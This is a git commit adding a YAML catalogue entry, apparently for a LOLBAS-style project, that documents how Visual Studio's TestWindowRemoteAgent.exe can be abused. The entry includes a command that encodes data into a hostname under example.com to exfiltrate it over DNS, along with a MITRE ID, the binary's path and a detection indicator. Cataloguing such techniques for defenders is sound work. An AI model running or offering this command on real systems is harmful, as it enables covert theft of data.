Create testwindowremoteagent.yaml

Data Exfiltration with TestWindowRemoteAgent.exe is added
2024-12-26 14:59:03 +01:00 · 2023-08-21 19:30:19 +03:00 · 2023-08-21 19:30:19 +03:00 · 25b6c36073
commit 25b6c36073
parent a6bf398fa8
1 changed files with 19 additions and 0 deletions
--- a/yml/OSBinaries/testwindowremoteagent.yaml
+++ b/yml/OSBinaries/testwindowremoteagent.yaml
@ -0,0 +1,19 @@
+---
+Name: TestWindowRemoteAgent.exe
+Description: TestWindowRemoteAgent.exe is the command-line tool to establish RPC
+Author: Onat Uzunyayla
+Created: 2023-21-08 
+Commands:
+  - Command: TestWindowRemoteAgent.exe start -h {your-base64-data}.example.com -p 8000
+    Description: Sends DNS query for open connection to any host, enabling exfiltration over DNS
+    Usecase: Attackers may utilize this to exfiltrate data over DNS
+    Category: Data Exfiltration
+    Privileges: User
+    MitreID: T1048
+    OperatingSystem: Windows 10, Windows 11
+Full_Path:
+  - Path: C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\CommonExtensions\Microsoft\TestWindow\RemoteAgent\TestWindowRemoteAgent.exe
+Detection:
+  - IOC: TestWindowRemoteAgent.exe spawning unexpectedly
+Acknowledgement:
+  - Person: Onat Uzunyayla